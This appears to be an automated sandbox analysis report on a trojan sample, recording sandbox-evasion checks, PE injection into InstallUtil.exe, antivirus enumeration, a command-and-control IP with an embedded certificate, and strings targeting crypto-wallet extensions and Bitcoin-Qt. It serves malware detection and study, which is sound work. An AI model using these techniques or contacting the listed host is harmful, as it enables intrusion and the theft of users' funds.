Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Thread delayed: delay time: 598281	Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Thread delayed: delay time: 598172	Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Thread delayed: delay time: 598062	Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Thread delayed: delay time: 597932	Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Thread delayed: delay time: 597828	Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Thread delayed: delay time: 597719	Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Thread delayed: delay time: 597594	Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Thread delayed: delay time: 597481	Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Thread delayed: delay time: 597374	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 37000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 36890	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 36781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 36671	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 36562	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 36453	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 36317	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 36181	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 36076	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 35968	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 35859	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 35749	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 35640	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 35531	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 35421	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 35312	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 35203	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 35093	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 34984	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 34865	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 34747	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 34638	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 34530	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 34421	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 34312	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 34203	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 34093	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 33984	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 33874	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 33765	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 33656	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 33546	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 33437	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 33328	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 33218	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 33109	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 32999	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 32890	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 32781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 32671	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 32562	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 32447	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 32343	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 32186	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 31934	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 31828	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Thread delayed: delay time: 599890	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Thread delayed: delay time: 599671	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Thread delayed: delay time: 599562	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Thread delayed: delay time: 599453	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Thread delayed: delay time: 599339	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Thread delayed: delay time: 599234	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Thread delayed: delay time: 599125	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Thread delayed: delay time: 599015	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Thread delayed: delay time: 598906	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Thread delayed: delay time: 598797	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Thread delayed: delay time: 598687	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Thread delayed: delay time: 598578	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Thread delayed: delay time: 598468	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Thread delayed: delay time: 598359	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Thread delayed: delay time: 598156	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Thread delayed: delay time: 597888	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Thread delayed: delay time: 597781	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Thread delayed: delay time: 597655	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Thread delayed: delay time: 597546	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Thread delayed: delay time: 597437	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Thread delayed: delay time: 597319	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Thread delayed: delay time: 597203	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Thread delayed: delay time: 599765	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Thread delayed: delay time: 599546	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Thread delayed: delay time: 599437	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Thread delayed: delay time: 599328	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Thread delayed: delay time: 599218	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Thread delayed: delay time: 599109	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Thread delayed: delay time: 599000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Thread delayed: delay time: 598881	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Thread delayed: delay time: 598750	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Thread delayed: delay time: 598640	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Thread delayed: delay time: 598531	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Thread delayed: delay time: 598421	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Thread delayed: delay time: 598312	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Thread delayed: delay time: 598203	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Thread delayed: delay time: 598091	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Thread delayed: delay time: 597981	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Thread delayed: delay time: 597854	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Thread delayed: delay time: 597718	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Thread delayed: delay time: 597580	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Thread delayed: delay time: 597362	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 922337203685477

Source: msql2.exe, 00000005.00000002.1936667834.0000000003572000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SerialNumber0VMware\|VIRTUAL\|A M I\|XenDselect * from Win32_ComputerSystem
Source: InstallUtil.exe, 00000001.00000002.4171522011.0000000005EEA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: InstallUtil.exe, 00000001.00000002.4171522011.0000000005ED8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWen-GBn
Source: InstallUtil.exe, 00000001.00000002.4168769540.00000000055B3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWH
Source: hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1724334331.0000000001062000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: msql2.exe, 00000005.00000002.1936667834.0000000003572000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: model0Microsoft\|VMWare\|Virtual
Source: msql2.exe, 00000002.00000002.1866301903.0000000000DB2000.00000004.00000020.00020000.00000000.sdmp, msql2.exe, 00000005.00000002.1934161172.00000000016BA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Detected PureCrypter Trojan

Source: InstallUtil.exe, 00000001.00000002.4149515832.00000000028F5000.00000004.00000800.00020000.00000000.sdmp

String found in binary or memory: 31.41.244.211MIIE4DCCAsigAwIBAgIQAKI76K+hVeLaTvofiVz9TTANBgkqhkiG9w0BAQ0FADARMQ8wDQYDVQQDDAZYdWltanIwIBcNMjQwOTE0MTY1NjU4WhgPOTk5OTEyMzEyMzU5NTlaMBExDzANBgNVBAMMBlh1aW1qcjCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAKYQzr446JBOTpfSRW/X/Un0LfoQtjEFcCPLax+z9I1vVwpdWj6kdo5thcgTh5GK8gmdcL1wkmJHzgPnlC0XGs23478pphZy4xENfqNlYdKTm0vjzy2uJC7Z5lHmna6pSX6DTuVpKw54JBAGCUDtI0mn3EV5+dJ+1xR54mvugabUjn0aWX4lHsv+APiJInpAJBqtzFW0BgAOJK07N/vFWHmakjy+NKJAF/gEG+B2JyFwWzm729P2b4aB4E9b/r9KKfpM235S9DXTbVqJnAgiEwH291ulserQn/gfqzVH9kMrrqa9310wS04QuEhCDZlvT2QNJVCRRaQiVGriIL/cG0duEqk3H06hzil1uEN3NZ5geFl/HoyzqmH8Pzn60p8PkEqdITyUXADJQN2+HtAz9ZGwDPwVV/LpB6W3MtDtwWE7yonkbIa+i4YwBsGds41m6Pk66wwnDDCwBY/NwUht4hlf2cY3SV3uHJC6IBMdSfzfXWBql4jmmSMPsiB48ChzQf+U+sl3ee7hV2wFOFq5wNfASKjQLdtTXk5vKIb6mFAX4L7nONtntIUQ3taxhw9wgLNb0iTjyTkJs0zI8ffsuFT3TrDxdOZsOhRpMwhr5SWMmRv6mdRSk8viEtxYr3F5nfDVs+Kp9YrUhn9tbbAxC75I5jZdN6kpZC90tsg9M9irAgMBAAGjMjAwMB0GA1UdDgQWBBQKqTXSJ2zPJXAiYYaW0wRWBYd/gzAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBDQUAA4ICAQBTFIKM0vXtl1GrNVkUK1VmD3aMjPQ5y2MPJZD8uFkFP59T8sFP4Y776p/x3ej5Z1F8lsHn+IX6CkGwQofe8jv/zstog7oNbv6fADdZ0hJNtBU/C6WWu5EYohtw8cGApb/CLYThBZWcL16IWW5OyjX/XhzLiVrNRwU9cIHdl1xLueyEmuyN4BeR4yqJEOuovMfN8UE//DvNlwpgwfGi9//4YEU+qyTIT1Cyod1CB4mCX7uYdbJyMiOvdRXIT/Cr8xFk12OdhJ41Iq/3o7TQDRpt+T2L1nquaxNQl2TD2Qn4aOWwqW4aa2VHhqqIaZigPWdMNr/ZVkyx64ZqHzQGoe/gnbs0saGU1dTeS1lqlMSL1wXdLwg9mLvqBzj1glijt4spLSzdSBrqTAc8cmgDfTUvZoG6SROQIWSC28IEJx6fzzoSlhULBzjGG9MCZi/j+VTnOy/XVGWonyoqVTipekop5IjLIcnatMFNqFNrarHU4fmn14+iuiMdmdDzlxGcOYDopLDxVtkCehOihb7jsgS0gnAoeL+sZ+cPyVO//er+yHjOr8l3iF1WpeDanFBtyyf9j+dpLdae7T8+gTjuAE+TJqYqVvKH50+rpyPkRGtfS+jN44XrRd475MP/KER5BwnG2F1AT4i9BGQA9Qm9NCON3qDXChvxS4zlgPVXHBSO4g=="Default

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5A	Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000	Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 458000	Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 45A000	Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 6A2008	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 458000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 45A000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: C50008	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 458000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 45A000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 63A008	Jump to behavior

Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"	Jump to behavior

Source: InstallUtil.exe, 00000001.00000002.4149515832.0000000002F21000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4149515832.0000000002FE9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerTe^qD
Source: InstallUtil.exe, 00000001.00000002.4149515832.0000000002E81000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerTe^qd
Source: InstallUtil.exe, 00000001.00000002.4149515832.0000000002CEE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerTe^q\1
Source: InstallUtil.exe, 00000001.00000002.4149515832.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerTe^q$
Source: InstallUtil.exe, 00000001.00000002.4149515832.0000000002CC7000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4149515832.0000000002D66000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4149515832.0000000002F21000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: InstallUtil.exe, 00000001.00000002.4149515832.0000000002D8E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerTe^q<3
Source: InstallUtil.exe, 00000001.00000002.4149515832.0000000002CA4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Managerram Manager
Source: InstallUtil.exe, 00000001.00000002.4149515832.0000000002CA4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Managerram Manager@\^q
Source: InstallUtil.exe, 00000001.00000002.4149515832.0000000002F75000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerTe^qy
Source: InstallUtil.exe, 00000001.00000002.4149515832.0000000002CC7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerTe^q<
Source: InstallUtil.exe, 00000001.00000002.4149515832.0000000002F99000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerTe^q\
Source: InstallUtil.exe, 00000001.00000002.4149515832.0000000002E31000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerTe^q(5
Source: InstallUtil.exe, 00000001.00000002.4149515832.0000000002D3E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerTe^qL2
Source: InstallUtil.exe, 00000001.00000002.4149515832.0000000002ED1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerTe^qT
Source: InstallUtil.exe, 00000001.00000002.4149515832.0000000002E31000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerTe^qt
Source: InstallUtil.exe, 00000001.00000002.4149515832.0000000002DE1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerTe^q,4
Source: InstallUtil.exe, 00000001.00000002.4149515832.0000000002F75000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerTe^qLV
Source: InstallUtil.exe, 00000001.00000002.4149515832.0000000002F49000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerTe^qp
Source: InstallUtil.exe, 00000001.00000002.4149515832.0000000002D16000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerTe^q,
Source: InstallUtil.exe, 00000001.00000002.4149515832.0000000002CC7000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4149515832.0000000002D66000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4149515832.0000000002F21000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerTe^q

Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Queries volume information: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Queries volume information: C:\Users\user\AppData\Roaming\msql2.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Queries volume information: C:\Users\user\AppData\Roaming\msql2.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation

Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Found many strings related to Crypto-Wallets (likely being stolen)

Source: InstallUtil.exe, 00000001.00000002.4149515832.00000000028F5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Electrum
Source: InstallUtil.exe, 00000001.00000002.4149515832.00000000028F5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: tibnejdfjmmkpcnlpebklmnkoeoihofecuTronLinkvnkbihfbeogaeaoehlefnkodbefgpgknnwMetaMaskxfhbohimaelbohpjbbldcngcnapndodjpyBinance Chain Walletzffnbelfdoeiohenkjibnmadjiehjhajb{Yoroi\|cjelfplplebdjjenllpjcblmjkfcffne}Jaxx Liberty~fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: InstallUtil.exe, 00000001.00000002.4149515832.00000000028F5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Exodus Web3
Source: InstallUtil.exe, 00000001.00000002.4149515832.00000000028F5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Ethereum
Source: InstallUtil.exe, 00000001.00000002.4173707669.0000000006790000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: set_UseMachineKeyStore

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Key opened: HKEY_CURRENT_USER\Software\Bitcoin\Bitcoin-Qt

Jump to behavior

Source: Yara match	File source: 00000004.00000002.2020798393.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.4149515832.00000000028F5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 3244, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 3384, type: MEMORYSTR

Mitre Att&ck Matrix

